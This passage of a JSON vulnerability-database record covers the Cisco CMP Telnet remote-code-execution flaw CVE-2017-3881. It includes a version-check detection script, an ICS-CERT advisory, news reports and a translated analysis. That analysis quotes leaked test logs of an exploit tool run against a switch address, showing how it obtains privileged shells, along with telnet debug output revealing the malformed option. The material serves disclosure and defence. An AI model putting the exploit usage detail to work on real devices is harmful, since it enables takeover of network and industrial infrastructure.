'12.2(25)SEE3',\n '12.2(25)SEE4',\n '12.2(25)SEF1',\n '12.2(25)SEF2',\n '12.2(25)SEF3',\n '12.2(25)SEG',\n '12.2(25)SEG1',\n '12.2(25)SEG3',\n '12.2(25)SG',\n '12.2(25)SG1',\n '12.2(25)SG2',\n '12.2(25)SG3',\n '12.2(25)SG4',\n '12.2(31)SG',\n '12.2(31)SG1',\n '12.2(31)SG2',\n '12.2(31)SG3',\n '12.2(31)SGA',\n '12.2(31)SGA1',\n '12.2(31)SGA10',\n '12.2(31)SGA11',\n '12.2(31)SGA2',\n '12.2(31)SGA3',\n '12.2(31)SGA4',\n '12.2(31)SGA5',\n '12.2(31)SGA6',\n '12.2(31)SGA7',\n '12.2(31)SGA8',\n '12.2(31)SGA9',\n '12.2(35)SE',\n '12.2(35)SE1',\n '12.2(35)SE2',\n '12.2(35)SE3',\n '12.2(35)SE5',\n '12.2(37)EY',\n '12.2(37)SE',\n '12.2(37)SE1',\n '12.2(37)SG',\n '12.2(37)SG1',\n '12.2(40)EX',\n '12.2(40)EX1',\n '12.2(40)EX2',\n '12.2(40)EX3',\n '12.2(40)SE',\n '12.2(40)SE1',\n '12.2(40)SE2',\n '12.2(40)SG',\n '12.2(40)XO',\n '12.2(44)EX',\n '12.2(44)EX1',\n '12.2(44)SE',\n '12.2(44)SE1',\n '12.2(44)SE2',\n '12.2(44)SE3',\n '12.2(44)SE4',\n '12.2(44)SE5',\n '12.2(44)SE6',\n '12.2(44)SG',\n '12.2(44)SG1',\n '12.2(44)SQ',\n '12.2(44)SQ2',\n '12.2(46)EX',\n '12.2(46)EY',\n '12.2(46)SE',\n '12.2(46)SE1',\n '12.2(46)SE2',\n '12.2(46)SG',\n '12.2(46)SG1',\n '12.2(50)SE',\n '12.2(50)SE1',\n '12.2(50)SE2',\n '12.2(50)SE3',\n '12.2(50)SE4',\n '12.2(50)SE5',\n '12.2(50)SG',\n '12.2(50)SG1',\n '12.2(50)SG2',\n '12.2(50)SG3',\n '12.2(50)SG4',\n '12.2(50)SG5',\n '12.2(50)SG6',\n '12.2(50)SG7',\n '12.2(50)SG8',\n '12.2(50)SQ',\n '12.2(50)SQ1',\n '12.2(50)SQ2',\n '12.2(50)SQ3',\n '12.2(50)SQ4',\n '12.2(50)SQ5',\n '12.2(50)SQ6',\n '12.2(50)SQ7',\n '12.2(52)EX',\n '12.2(52)EX1',\n '12.2(52)SE',\n '12.2(52)SE1',\n '12.2(52)SG',\n '12.2(52)XO',\n '12.2(53)EY',\n '12.2(53)EZ',\n '12.2(53)SE',\n '12.2(53)SE1',\n '12.2(53)SE2',\n '12.2(53)SG',\n '12.2(53)SG1',\n '12.2(53)SG10',\n '12.2(53)SG11',\n '12.2(53)SG2',\n '12.2(53)SG3',\n '12.2(53)SG4',\n '12.2(53)SG5',\n '12.2(53)SG6',\n '12.2(53)SG7',\n '12.2(53)SG8',\n '12.2(53)SG9',\n '12.2(54)SE',\n '12.2(54)SG',\n '12.2(54)SG1',\n '12.2(54)WO',\n 
'12.2(54)XO',\n '12.2(55)EX',\n '12.2(55)EX1',\n '12.2(55)EX2',\n '12.2(55)EX3',\n '12.2(55)EY',\n '12.2(55)EZ',\n '12.2(55)SE',\n '12.2(55)SE1',\n '12.2(55)SE10',\n '12.2(55)SE11',\n '12.2(55)SE2',\n '12.2(55)SE3',\n '12.2(55)SE4',\n '12.2(55)SE5',\n '12.2(55)SE6',\n '12.2(55)SE7',\n '12.2(55)SE8',\n '12.2(55)SE9',\n '12.2(58)EX',\n '12.2(58)EZ',\n '12.2(58)SE',\n '12.2(58)SE1',\n '12.2(58)SE2',\n '12.2(60)EZ4',\n '12.2(60)EZ5',\n '15.0(1)EY',\n '15.0(1)EY1',\n '15.0(1)EY2',\n '15.0(1)SE',\n '15.0(1)SE1',\n '15.0(1)SE2',\n '15.0(1)SE3',\n '15.0(1)XO',\n '15.0(1)XO1',\n '15.0(2)EB',\n '15.0(2)EC',\n '15.0(2)ED',\n '15.0(2)EJ',\n '15.0(2)EJ1',\n '15.0(2)EX',\n '15.0(2)EX1',\n '15.0(2)EX10',\n '15.0(2)EX2',\n '15.0(2)EX3',\n '15.0(2)EX4',\n '15.0(2)EX5',\n '15.0(2)EX8',\n '15.0(2)EY',\n '15.0(2)EY1',\n '15.0(2)EY2',\n '15.0(2)EY3',\n '15.0(2)EZ',\n '15.0(2)SE',\n '15.0(2)SE1',\n '15.0(2)SE10',\n '15.0(2)SE10a',\n '15.0(2)SE11',\n '15.0(2)SE2',\n '15.0(2)SE3',\n '15.0(2)SE4',\n '15.0(2)SE5',\n '15.0(2)SE6',\n '15.0(2)SE7',\n '15.0(2)SE8',\n '15.0(2)SE9',\n '15.0(2)SG',\n '15.0(2)SG1',\n '15.0(2)SG10',\n '15.0(2)SG11',\n '15.0(2)SG2',\n '15.0(2)SG3',\n '15.0(2)SG4',\n '15.0(2)SG5',\n '15.0(2)SG6',\n '15.0(2)SG7',\n '15.0(2)SG8',\n '15.0(2)SG9',\n '15.0(2)SQD',\n '15.0(2)SQD1',\n '15.0(2)SQD2',\n '15.0(2)SQD3',\n '15.0(2)SQD4',\n '15.0(2)SQD5',\n '15.0(2)XO',\n '15.0(2a)EX5',\n '15.0(2a)SE9',\n '15.1(1)SG',\n '15.1(1)SG1',\n '15.1(1)SG2',\n '15.1(2)SG',\n '15.1(2)SG1',\n '15.1(2)SG2',\n '15.1(2)SG3',\n '15.1(2)SG4',\n '15.1(2)SG5',\n '15.1(2)SG6',\n '15.1(2)SG7',\n '15.1(2)SG7a',\n '15.1(2)SG8',\n '15.1(2)SG9',\n '15.2(1)E',\n '15.2(1)E1',\n '15.2(1)E2',\n '15.2(1)E3',\n '15.2(1)EY',\n '15.2(2)E',\n '15.2(2)E1',\n '15.2(2)E2',\n '15.2(2)E3',\n '15.2(2)E4',\n '15.2(2)E5',\n '15.2(2)E5a',\n '15.2(2)E5b',\n '15.2(2)E6',\n '15.2(2)EB',\n '15.2(2)EB1',\n '15.2(2)EB2',\n '15.2(2a)E1',\n '15.2(2a)E2',\n '15.2(3)E',\n '15.2(3)E1',\n '15.2(3)E2',\n '15.2(3)E3',\n '15.2(3)E4',\n 
'15.2(3)E5',\n '15.2(3)EX',\n '15.2(3a)E',\n '15.2(3a)E1',\n '15.2(3m)E2',\n '15.2(3m)E3',\n '15.2(3m)E6',\n '15.2(3m)E8',\n '15.2(4)E',\n '15.2(4)E1',\n '15.2(4)E2',\n '15.2(4)E3',\n '15.2(4)EC',\n '15.2(4)EC1',\n '15.2(4)EC2',\n '15.2(4m)E1',\n '15.2(4m)E3',\n '15.2(4n)E2',\n '15.2(4o)E2',\n '15.2(4p)E1',\n '15.2(5)E',\n '15.2(5)E1',\n '15.2(5)EX',\n '15.2(5a)E',\n '15.2(5a)E1',\n '15.2(5b)E',\n '15.2(5c)E' );\n\nforeach af ( affected )\n{\n if( version == af )\n {\n report = report_fixed_ver( installed_version:version, fixed_version: \"See advisory\" );\n security_message( port:0, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ics": [{"lastseen": "2023-07-28T08:11:10", "description": "### **CVSS v3 9.8**\n\n**ATTENTION: **Remotely exploitable/low skill level to exploit.\n\n**Vendor:** Rockwell Automation\n\n**Equipment:** Allen-Bradley Stratix, Allen-Bradley ArmorStratix\n\n**Vulnerability:** Improper Input Validation\n\n## AFFECTED PRODUCTS\n\nThe following versions of the Allen-Bradley Stratix and ArmorStratix Industrial Ethernet and Distribution switches are affected:\n\n * Allen-Bradley Stratix 5400 Industrial Ethernet Switches, All Versions 15.2(5)EA.fc4 and earlier,\n * Allen-Bradley Stratix 5410 Industrial Distribution Switches, All Versions 15.2(5)EA.fc4 and earlier,\n * Allen-Bradley Stratix 5700 and ArmorStratix 5700 Industrial Managed Ethernet Switches, All Versions 15.2(5)EA.fc4 and earlier,\n * Allen-Bradley Stratix 8000 Modular Managed Industrial Ethernet Switches, All Versions 15.2(5)EA.fc4 and earlier, and\n * Allen-Bradley Stratix 8300 Modular Managed Industrial Ethernet Switches, All Versions 15.2(4a)EA5 and earlier.\n\n## IMPACT\n\nSuccessful exploitation of this vulnerability may allow a remote attacker to impact the availability of the target device or to execute arbitrary code with elevated privileges.\n\n## MITIGATION\n\nRockwell Automation has provided interim 
compensating controls for Allen-Bradley Stratix and ArmorStratix switches to help reduce the risk of exploitation of the vulnerability identified in the Cisco Cluster Management Protocol (CMP) processing code used in the Cisco IOS and Cisco IOS XE software. Allen-Bradley Stratix and ArmorStratix products contain the affected versions of the Cisco IOS and IOS XE software.\n\nRockwell Automation encourages users to evaluate the compensating controls provided below and apply the applicable controls.\n\n * Disable the Telnet protocol as an allowed protocol for incoming connections on affected devices to diminish the network-based vector of attack. For information on how to disable Telnet via Command Line Interface, please see Knowledgebase Article ID 1040270, which is available at the following location (with a valid account):\n\n<https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1040270>\n\n * If a user is unable or unwilling to disable Telnet, then implementing infrastructure access control lists (iACLs) can reduce the attack surface. For information on how to implement iACLs, please see Knowledgebase Article ID 1040270.\n * Cisco has created two Snort rules (SIDs), 41909 and 41910, to detect exploits associated with this vulnerability.\n\nRockwell Automation security advisory, Stratix CMP Remote Code Execution Vulnerability, is available at the following location (with a valid account):\n\n<https://rockwellautomation.custhelp.com/app/answers/detail/a_id/54102>\n\nCisco\u2019s security advisory, Cisco IOS and IOS XE Software Cluster Management Protocol Remote Code Execution Vulnerability, is available at the following location:\n\n<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp>\n\nNCCIC/ICS-CERT recommends that users take defensive measures to minimize the risk of exploitation of this vulnerability. 
Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site.\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n## VULNERABILITY OVERVIEW\n\n## [IMPROPER INPUT VALIDATION CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)\n\nAn unauthorized remote attacker may be able to establish a Telnet session with a target device by sending malformed CMP-specific Telnet messages. Incorrect processing of these messages may cause the device to reload or to allow the attacker to execute arbitrary code with elevated privileges.\n\n[CVE-2017-3881](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-3881>) has been assigned to this vulnerability. 
A CVSS v3 base score of 9.8 has been assigned; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n## RESEARCHER\n\nRockwell Automation has reported this vulnerability.\n\n## BACKGROUND\n\n**Critical Infrastructure Sector(s):** Critical Manufacturing, Energy, Water and Wastewater Systems\n\n**Countries/Areas Deployed:** Worldwide\n\n**Company Headquarters Location:** Milwaukee, Wisconsin\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-04T12:00:00", "type": "ics", "title": "Rockwell Automation Allen-Bradley Stratix and Allen-Bradley ArmorStratix", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-3881"], "modified": "2017-04-04T12:00:00", "id": "ICSA-17-094-03", "href": "https://www.cisa.gov/news-events/ics-advisories/icsa-17-094-03", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2017-04-18T03:22:45", "description": "! 
[](/Article/UploadPic/2017-4/201741811149488.jpg)\n\nOn March 17, 2017, Cisco announced on its official website that the Cluster Management Protocol (CMP) in Cisco IOS and IOS XE Software contains a remote code execution vulnerability, CVE-2017-3881.\n\nCisco discovered the vulnerability while studying the \u201cVault 7\u201d documents leaked from the CIA. An unauthenticated remote attacker can cause an affected device to reload or execute arbitrary code on it. The vulnerability has two main causes: the use of CMP-specific Telnet options is not restricted to internal, local communication between cluster members, so such options are accepted over any Telnet connection to an affected device; and malformed CMP-specific Telnet options are processed incorrectly. By sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected device, an attacker can remotely execute arbitrary code and take complete control of the device, or make the device reboot.\n\nAs of this writing, Cisco has not yet released a fix for the Cluster Management Protocol remote code execution vulnerability CVE-2017-3881.\n\nThe Vault 7 documents disclose the test process of a remote code execution exploit; the exploit source code is not included, only its use in interactive mode and set mode. Interactive mode sends the payload over telnet and, in the same telnet connection, immediately gives the attacker a command shell:\n\n\nStarted ROCEM interactive session - successful:\nroot@debian:/home/user1/ops/adverse/adverse-1r/rocem# ./ rocem_c3560-ipbase-mz.122-35.SE5.py -i 192.168.0.254\n[+] Validating data/interactive. bin\n[+] Validating data/set. bin\n[+] Validating data/transfer. bin\n[+] Validating data/unset. bin\n****************************************\nImage: c3560-ipbase-mz. 122-35. 
SE5\nHost: 192.168.0.254\nAction: Interactive\n****************************************\nProceed? (y/n)y\nTrying 127.0.0.1...\n[*] Attempting connection to host 192.168.0.254:23\nConnected to 127.0.0.1.\nEscape character is '^]'.\n[+] Connection established\n[*] Starting the interactive session\nUser Access Verification\nPassword:\nMLS-Sth#\nMLS-Sth# show priv\nThe Current privilege level is 15\nMLS-Sth#show users\nLine User Host(s) Idle Location\n* 1 vty 0 idle 00:00:00 192.168.221.40\nInterface User Mode Idle Peer Address\nMLS-Sth#exit\nConnection closed by foreign host.\n\nSet mode modifies the switch's memory in advance, so that a later telnet connection is accepted without authentication:\n\n\nTest set/unset feature of ROCEM\nThe DUT is configured with the target configuration and network setup\nThe DUT is accessed by hopping through three flux nodes as per the CONOP\nReloaded the DUT to start with a clean device\nFrom Adverse ICON machine, set ROCEM:\nroot@debian:/home/user1/ops/adverse/adverse-1r/rocem# ./ rocem_c3560-ipbase-mz.122-35.SE5.py -s 192.168.0.254\n[+] Validating data/interactive. bin\n[+] Validating data/set. bin\n[+] Validating data/transfer. bin\n[+] Validating data/unset. bin\n****************************************\nImage: c3560-ipbase-mz. 122-35. SE5\nHost: 192.168.0.254\nAction: Set\n****************************************\nProceed? (y/n)y\n[*] Attempting connection to host 192.168.0.254:23\n[+] Connection established\n[*] Sending Protocol Step 1\n[*] Sending Protocol Step 2\n[+] Done\nroot@debian:/home/user1/ops/adverse/adverse-1r/rocem#\nVerified I could telnet and rx priv 15 without creds:\nroot@debian:/home/user1/ops/adverse/adverse-1r/rocem# telnet 192.168.0.254\nTrying 192.168.0.254...\nConnected to 192.168.0.254.\nEscape character is '^]'.\nMLS-Sth#\nMLS-Sth#show priv\nThe Current privilege level is 15\nMLS-Sth#\n\nWhile studying this vulnerability, we found one piece of information useful to us: the telnet debug output:\n\n\n14. 
Confirm Xetron EAR 5355 - Debug telnet causes anomalous output \n1. Enabled the debug telnet on DUT\n2. Set ROCEM\n3. Observed the following:\n000467: Jun 3 13:54:09.330: TCP2: Telnet received WILL TTY-SPEED (32) (refused)\n000468: Jun 3 13:54:09.330: TCP2: Telnet sent DONT TTY-SPEED (32)\n000469: Jun 3 13:54:09.330: TCP2: Telnet received WILL LOCAL-FLOW (33) (refused)\n000470: Jun 3 13:54:09.330: TCP2: Telnet sent DONT LOCAL-FLOW (33)\n000471: Jun 3 13:54:09.330: TCP2: Telnet received WILL LINEMODE (34)\n000472: Jun 3 13:54:09.330: TCP2: Telnet sent DONT LINEMODE (34) (unimplemented)\n000473: Jun 3 13:54:09.330: TCP2: Telnet received WILL NEW-ENVIRON (39)\n000474: Jun 3 13:54:09.330: TCP2: Telnet sent DONT NEW-ENVIRON (39) (unimplemented)\n000475: Jun 3 13:54:09.330: TCP2: Telnet received DO STATUS (5)\n000476: Jun 3 13:54:09.330: TCP2: Telnet sent WONT STATUS (5) (unimplemented)\n000477: Jun 3 13:54:09.330: TCP2: Telnet received WILL X-DISPLAY (35) (refused)\n000478: Jun 3 13:54:09.330: TCP2: Telnet sent DONT X-DISPLAY (35)\n000479: Jun 3 13:54:09.330: TCP2: Telnet received DO ECHO (1)\n000480: Jun 3 13:54:09.330: Telnet2: recv SB NAWS 116 29\n000481: Jun 3 13:54:09.623: Telnet2: recv SB 36 92 OS^K'zAuk,Fz90X\n000482: Jun 3 13:54:09.623: Telnet2: recv SB 36 0 ^CCISCO_KITS^Ap\n\nNote that the last line shows the CISCO_KITS option being received; this string later proves to be important.\n\nAccording to what Cisco has published so far, a total of 318 products are affected by this vulnerability; for the detailed product list, see the Appendix.\n\nCurrently only the following two classes of products are not affected by this vulnerability:\n\n1. Products running Cisco IOS Software that are not in the list of affected devices.\n\n2. Products running Cisco IOS XE Software that do not include the CMP protocol subsystem.\n\nDetection method for CVE-2017-3881\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-04-18T00:00:00", "type": "myhack58", "title": "Cisco Catalyst 2960 switch in CVE-2017-3881 vulnerability analysis-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-3881"], "modified": "2017-04-18T00:00:00", "id": "MYHACK58:62201785361", "href": "http://www.myhack58.com/Article/html/3/62/2017/85361.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cisa_kev": [{"lastseen": "2023-07-21T17:22:44", "description": "A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges.", 
"cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-25T00:00:00", "type": "cisa_kev", "title": "Cisco IOS and IOS XE Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-3881"], "modified": "2022-03-25T00:00:00", "id": "CISA-KEV-CVE-2017-3881", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2018-01-27T09:17:39", "description": "[](<https://2.bp.blogspot.com/-KIXE9BbUCXE/WRMHDL-IzYI/AAAAAAAAsjA/T4B956p7tjwhvoHd79DRUZckANQcxx9XwCLcB/s1600/cisco-switches-patch-update.png>)\n\nCisco Systems has finally [released](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp>) an update for its IOS and IOS XE software to address a critical vulnerability, disclosed nearly two months back in the [CIA Vault 7 leak](<https://thehackernews.com/2017/03/cisco-network-switch-exploit.html>), that affects more than 300 of its switch models. 
\n \nThe company identified the vulnerability in its product while analyzing \"Vault 7\" dump \u2014 thousands of documents and files leaked by Wikileaks, claiming to detail hacking tools and tactics of the U.S. Central Intelligence Agency (CIA). \n \nAs [previously reported](<https://thehackernews.com/2017/03/cisco-network-switch-exploit.html>), the vulnerability (CVE-2017-3881) resides in the Cluster Management Protocol (CMP) \u2014 which uses Telnet or SSH to deliver signals and commands on internal networks \u2014 in Cisco IOS and Cisco IOS XE Software. \n \nThe vulnerability can be exploited remotely by sending \"malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections,\" researchers say. \n \nThe company warned users on April 10 that an exploit targeting the flaw had been made public (here's a [proof-of-concept (PoC) exploit](<https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/>)) and provided some mitigation advice, but patched the issue this week only. \n \nOnce exploited, an unauthenticated, remote attacker can remotely execute malicious code on a device with elevated privileges to take full control of the device or cause a reboot of the affected device. \n \nThe vulnerability is in the default configuration of the affected Cisco devices and affects 264 Catalyst switches, 51 industrial Ethernet switches, and 3 other devices if they are running IOS and are configured to accept Telnet connections. 
\n \nThe affected Cisco switch models include Catalyst switches, Embedded Service 2020 switches, IE Industrial Ethernet switches, ME 4924-10GE switch, Enhanced Layer 2/3 EtherSwitch Service Module, Enhanced Layer 2 EtherSwitch Service Module, RF Gateway 10, SM-X Layer 2/3 EtherSwitch Service Module, and Gigabit Ethernet Switch Module for HP (check the [list of affected models](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp>) here). \n \nThe vulnerability was given a score of 9.8 (higher level of risk) based on the Common Vulnerability Scoring System, which means the issue is truly bad. \n \nThe only mitigation available for users was to disable the Telnet connection to the switch devices in favor of SSH, but now since the company has patched the issue, administrators are strongly advised to install the patch as soon as possible.\n", "cvss3": {}, "published": "2017-05-10T01:27:00", "type": "thn", "title": "Cisco Finally Patches 0-Day Exploit Disclosed In Wikileaks-CIA Leak", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-3881"], "modified": "2017-05-10T12:27:27", "id": "THN:BCA8EAC492CA7110C715BA2B88A40246", "href": "https://thehackernews.com/2017/05/cisco-network-switch-update.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:15", "description": "[](<https://2.bp.blogspot.com/-lSlZv3J44jE/WM-QAmPBkcI/AAAAAAAAr2E/m1cKN0mm_OQcS4OT4J8GWJwLD4Vtiq0egCLcB/s1600/cisco-network-switch-telnet-exploit-wikileaks-cia-hacking.png>)\n\nCisco is warning of a new critical zero-day IOS / IOS XE vulnerability that affects more than 300 of its switch models. 
\n \nThe company identified this highest level of vulnerability in its product while analyzing \"[Vault 7](<https://thehackernews.com/2017/03/wikileaks-cia-hacking-tool.html>)\" \u2014 a roughly 8,761 documents and [files leaked by Wikileaks](<https://thehackernews.com/2017/03/wikileaks-cia-hacking-exploits.html>) last week, claiming to [detail hacking tools](<https://thehackernews.com/2017/03/wikileaks-cia-vault7-leak.html>) and tactics of the Central Intelligence Agency (CIA). \n \nThe vulnerability resides in the Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software. \n \nIf exploited, the flaw ([CVE-2017-3881](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3881>)) could allow an unauthenticated, remote attacker to cause a reboot of an affected device or remotely execute malicious code on the device with elevated privileges to take full control of the device, Cisco says in its [advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp>). \n \nThe CMP protocol has been designed to pass around information about switch clusters between cluster members using Telnet or SSH. \n \nThe vulnerability is in the default configuration of affected Cisco devices, even if the user doesn't configure any cluster configuration commands. The flaw can be exploited during Telnet session negotiation over either IPv4 or IPv6. 
\n \nAccording to the Cisco researchers, this bug occurs in Telnet connections within the CMP, due to two factors: \n \n\n\n * The protocol doesn't restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members; instead, it accepts and processes commands over any Telnet connection to an affected device.\n * The incorrect processing of malformed CMP-specific Telnet options.\n \nSo, in order to exploit this vulnerability, an attacker can send _\"malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections,\" _researchers say. \n \nThis exploitation could allow the attacker to remotely execute malicious code and obtain full control of the affected device or cause a reload of the affected device. \n \n\n\n### Disable Telnet On Vulnerable Models \u2014 Patch is not Available Yet!\n\n \nThe vulnerability affects 264 Catalyst switches, 51 industrial Ethernet switches, and 3 other devices, which includes Catalyst switches, Embedded Service 2020 switches, Enhanced Layer 2/3 EtherSwitch Service Module, Enhanced Layer 2 EtherSwitch Service Module, ME 4924-10GE switch, IE Industrial Ethernet switches, RF Gateway 10, SM-X Layer 2/3 EtherSwitch Service Module, and Gigabit Ethernet Switch Module (CGESM) for HP. (check [complete list](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp>) here) \n \nCurrently, this vulnerability is unpatched, and until patches are available, Cisco recommends its users to disable the Telnet connection to the switch devices in favor of SSH. 
\n \nThe company's advisory doesn't talk about any working exploit using this flaw, but if there's one, tens of thousands, if not hundreds of thousands, of devices installed around the world look to have been at great risk for an unknown period \u2014 Thanks to the [CIA for holding the flaw](<https://thehackernews.com/2017/03/cia-wikileaks-hacking.html>). \n \nCisco will update its IOS Software Checker tool immediately as soon as the patches come out.\n", "cvss3": {}, "published": "2017-03-19T21:20:00", "type": "thn", "title": "Disable TELNET! Cisco finds 0-Day in CIA Dump affecting over 300 Network Switch Models", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-3881"], "modified": "2017-03-20T08:20:05", "id": "THN:02E235897DBA5868AE53102FE4D52D7B", "href": "https://thehackernews.com/2017/03/cisco-network-switch-exploit.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:27:25", "description": "A remote code execution vulnerability exists in Cisco IOS. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-04-15T00:00:00", "type": "checkpoint_advisories", "title": "Cisco IOS Remote Code Execution (CVE-2017-3881) - Ver2", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-3881"], "modified": "2018-07-31T00:00:00", "id": "CPAI-2018-0780", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2023-09-20T18:39:38", "description": "A vulnerability in the 